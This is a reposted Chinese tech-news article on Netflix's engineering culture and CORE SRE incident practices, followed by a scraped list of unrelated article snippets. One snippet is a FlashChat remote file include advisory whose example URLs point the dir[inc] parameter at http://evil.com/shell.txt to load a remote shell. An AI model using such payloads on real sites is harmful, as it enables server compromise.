从工程文化和运维理念理解Netflix

http://www.infoq.com/cn/news/2018/01/netflix-engineering-culture

 

在技术圈儿,Netflix 是一家非常有特色的互联网公司。他们信奉“自由与责任”的企业文化,鼓励工程师发挥自己的爱好与特长;特别开放,很多内部系统都开源了;所有业务都运行在云上,随之而来,有很多自己的工具,特色的运维文化。

在明年 4 月 20~22 日的 QCon 北京 2018 上,我们有幸邀请到 Netflix 工程总监 Katharina Probst,她将分享 Netflix 的工程文化以及运维方面的理念和经验。

InfoQ 曾有文章介绍 Netflix 的企业文化(技术漫谈:为什么Netflix的企业文化会备受整个硅谷的推崇?),而这次,Katharina 将现场分享《工程文化:挖掘工程师的最大价值》。

丹尼尔·平克的《驱动力》一书,指出了如何提高绩效、焕发热情的三大要素:自主(Autonomy)、专精(Mastery)和目的(Purpose)。本次演讲也将从这三个方面出发,探讨如何让工程师发掘出自己的最大潜能。

  • 自主:设定良好的环境,但是不控制目标的日常执行。
  • 专精:为每个人提供锻炼技能的条件,并对成长提供反馈。
  • 目的:将工程师连接起来,为公司的使命而奋斗。

Katharina 还曾撰文介绍 Netflix 背后独特的运维理念。

在Netflix,“自由与责任”的价值观体现的淋漓尽致。一方面,工程团队可以自由地向产品添加功能和服务,不需要审批和繁琐的程序。另一方面,作为产品的所有者,要负责服务的运维和支持。

优势当然是各团队可以灵活快速地实现新功能。当然,有利就有弊,整个系统的规模也随之爆炸性增长,没有人能记着所有系统的所有变更。

这种情况下,Netflix 是如何保证其服务的高可用性和用户体验的呢?秘密就在于 Netflix 的 CORE SRE 团队。

SRE 是指 Site Reliability Engineer (网站可靠性工程师)。这个概念大家应该并不陌生。

CORE 是几个单词的首字母缩写:Cloud(云)、Operations(运维)、Reliability(可靠性)、Engineering(工程)。一语双关,既可以看成“云运维可靠性工程”,也可以看成“核心”。

这个团队非常小,不到 10 个人。虽然人少,但是都是骨干人才。可以把这个团队看作 Netflix 服务的中枢神经系统。这个团队是干什么的呢?

他们要尽可能多的从整体上把握 Netflix 的系统,进而让系统更好、更可靠。具体而言,其工作是:

  1. 理解事故(incident);
  2. 发现事故和健康运维状况下的模式;
  3. 将模式转变成工具和最佳实践,防患于未然。

理解事故

事故发生时,SRE 往往是第一响应人。这个人要定位问题,深入了解事故,确定严重等级,看看应该找谁来解决问题。要找的人可能是服务的所有者,或者外部合作伙伴(比如设备供应商)。

CORE SRE 团队要根据自己对整个系统的理解,决定在既定情况下,采用哪种缓解策略最好,比如把流量切到其他区域。

发现事故和健康运维状况下的模式

事故解决后,SRE 的工作才算真正开始。下一步是仔细研究事故,提很多问题。比如: 
• 事故是什么原因导致的? 
• 我们之前怎么做,能够避免这次事故? 
• 是不是有某个最佳实践并没有遵守? 
• 是不是团队遵守了某个最佳实践,但是没起到预期效果? 
• 团队应该怎么做,以避免再次发生类似事故? 
• 在事故发生时,我们掌握了哪些信息,能让我们更快地理解事故原因? 
• 有什么工具可以帮我们降低事故严重性和持续时间? 
• 这种问题之前发生过吗?有没有什么模式? 
• 卷入事故的团队,是不是犯了更多主动失误?发生了什么?

除了提问分析,还要分析事故数据,发现模式。

将模式转变成工具和最佳实践,防患于未然

让 Core SRE 团队和关键工程团队配合工作,一方面 SRE 团队可以更好地理解痛点,一方面也可以传达最佳实践等理念。

工具建设,收集各方面指标,这个就不一一具体介绍了。

在现场,Katharina 将为我们具体阐述背后的各种理念和做法。

2018QCon全球软件开发大会北京站目前正在8折报名中,感兴趣的不要错过。有任何问题可咨询购票经理Hanna,电话:15110019061,微信:qcon-0410。

转载于:https://www.cnblogs.com/linkenpark/p/8472368.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/486785.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python 程序 可以一直输入 quit_从零开始学Python - 第002课:第一个Python程序

在上一课中,我们已经了解了Python这门语言并安装了运行Python程序所需的环境,相信大家已经迫不及待的想开始自己的Python编程之旅了。首先我们来告诉大家在哪些地方可以写Python程序。编写代码的工具交互式环境我们打开Windows的“命令行提示符”工具&am…

清华张钹院士专刊文章:迈向第三代人工智能(全文收录)

来源:清华大学人工智能研究院作者:张钹、朱军、苏航在这篇评述文章中,清华大学人工智能研究院院长、中国科学院院士张钹教授阐述了自己对于「第三代人工智能」的看法。他认为,第三代 AI 发展的思路是把第一代的知识驱动和第二代的…

java 垂直走马灯多行,Android实现图文垂直跑马灯效果

最近在维护老项目,老项目有一个地方需要修改,就是垂直跑马灯的问题,之前的垂直跑马灯是只有文字跑马灯,新版需要加上。之前是用的MarqueeView,看了下源代码是只支持文字的,于是我就改了下原作者的源代码。M…

cf2.25

T1 题意:判断给出的数中有多少不同的大于的数。 content:傻逼题,5min手速 T2 题意:给出p、y,输出y~p1中最大一个不是2~p的倍数的数。 content:答案很简单,但是很难想到(对…

惠普打印机怎么无线连接电脑_惠普打印机连不上无线?怎么解!

打印机有无线功能,但却总连不上路由,看着高大上的功能用不上,是不是很捉急?今天总结了5种打印机连接无线的方法,总有一款适合你~- 方 1 法 -在打印机屏幕上配置无线本方法适用于带有无线网络功能且有可视面板屏幕的打印…

matlab实验符号计算答案,实验7 Matlab符号计算.doc

实验7 Matlab符号计算实验目的:掌握定义符号对象的方法;掌握符号表达式的运算法则以及符号矩阵运算。掌握求符号函数极限及导数的方法。掌握求符号函数定积分和不定积分的方法。实验内容:已知x6,y5,利用符号表达式求分解因式。(1)&#xff1b…

spring framework体系结构及内部各模块jar之间的maven依赖关系

http://blog.csdn.net/qq_27093465/article/details/65660689 http://blog.csdn.net/qq_27093465/article/details/68961393转载于:https://www.cnblogs.com/hougebajie/p/8473089.html

mac 用户 文件夹 权限_Mac视频播放软件推荐

Mac上好用的视频播放器KPlayer mac是一款Mac上非常好用的视频播放器,这款播放器可以帮助用户观看各种高清的电影。这款KPlayer mac能够以标准和高清晰度打开和播放各类视频。通过设置H.264硬件加速,达到控制720p,1080p视频文件的渲染和播放的…

麦肯锡季刊 | 人工智能的发展与障碍

来源:麦肯锡作者:Michael Chui,Sankalp Malhotra受访者表示,人工智能正在迅速普及,但预计不会大规模减少企业用工人数。目前,仅有极少数企业具备让人工智能创造规模化价值的基本要素。麦肯锡一项以人工智能…

php7 返回值,7.6.4 函数返回值

### 7.6.4 函数返回值调用内部函数时其返回值指针作为参数传入,这个参数为zval *return_value,如果函数有返回值直接设置此指针即可,需要特别注意的是设置返回值时需要增加其引用计数,举个例子来看:cPHP_FUNCTION(my_f…

C#本质论pdf

下载地址:网盘下载内容简介 《C#本质论》是一本清晰、简明的C#教程,涵盖了C#2.0。书中对C#语言的每个重要结构都用简短的示例代码进行说明,并且和其他语言进行了全方位比较。每章开头的“思维导图”指明了本章要讨论的主题以及每个主题…

微星主板黑苹果_在老机器上LGA775平台安装黑苹果MacOS系统 – 玄烨品果

这篇算不得上是教程,顶多是玄烨个人心得而已。因为在装黑苹果这个技术上,玄烨并不是高手,最多是个入门的菜鸟。DSDT注入、驱动修改,通通都不会。能不显卡驱动好,网卡工作正常、声音搞定就满意了。开始分享安装过程。相…

matlab实现脑电信号的相位同步分析,视听刺激脑电信号的相位同步分析

第29卷 第4期 2012年 8月              生物医学工程学杂志 Journal o…

毕马威发布《人工智能无处不在》研究报告:人工智能在五大行业的成就与挑战...

来源:AIII研究院毕马威近期发布了研究报告《人工智能无处不在》。该报告对751名在人工智能各行业应用领域具有一定了解的企业决策者进行调研并发布了“成绩单”,总结分析了人工智能在医疗保健、金融服务、交通运输、科技、零售业五大不同行业的应用表现与…

1660用哪个驱动稳定_PDF转word怎么转?哪个PDF转换器最好用?-PDF ——快科技(驱动之家旗下媒体)-...

PDF转word怎么转?平时在生活中,很多朋友都会使用到将PDF转换成Word文档,因为一般情况下PDF文件是不能直接编辑修改的。那么用什么方法才能将PDF文档转换成Word呢!其实学会下面这2个方法就可以将它完整地实现转换效果。方法一&…

php flash chat,FlashChat lt;= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability

NeXtMaN <mc.nadz [at] gmail.com>Here are 3 RFI vulnerabilities in Flashchat ive found:Code:http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]http://evil.com/shell.txt?http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]…

OpenAI推出数学推理证明模型,推理结果首次被数学家接受

大数据文摘出品作者&#xff1a;牛婉杨今年6月&#xff0c;OpenAI发布一款强大的文本生成模型GPT-3&#xff0c;不少网友迅速上手用了起来&#xff0c;有人用它写食谱、写歌词&#xff0c;甚至有人用它写博客&#xff0c;愣是以假乱真登上了新闻平台技术板块热榜第一。前不久&a…

卡苹果6plus在线_@哈尔滨家长:学生卡初次申办,需要到线下网点办理!

去办理业务&#xff0c;就怕人多排队&#xff01;9月份开学后&#xff0c;不少孩子上下学要赶公交&#xff0c;对没有手机的孩子来说&#xff0c;公交IC卡成了出门必备“神器”。对家长来说&#xff0c;充值、缴费成了难题&#xff0c;缴多了怕卡丢&#xff0c;少了还要总去&am…

A1051. DNA序列

问题描述 人类基因组计划的第一阶段于2000年6月26日胜利结束&#xff0c;我国的科研工作者圆满地完成了其中的1%的测序工作。众所周知&#xff0c;对于任意两个人来说&#xff0c;他们的染色体上的DNA序列大部分是相同的&#xff08;否则就不是同一物种了&#xff09;&#xff…

dm_php库,dmandwp系统 PHP建站系统+wordpress建站和DM系统区块+安装教程

dmandwp 系统(又名 wordpress 建站和 DM 系统区块)是一款使用 DM 系统的区块功能&#xff0c;让 wordpress 建站更方便的 PHP 建站系统。DM 系统的优势就是区块功能。现在把 DM 的区块功能做为插件&#xff0c;用在 wordpress 系统上。分类和内容&#xff0c;菜单&#xff0c;路…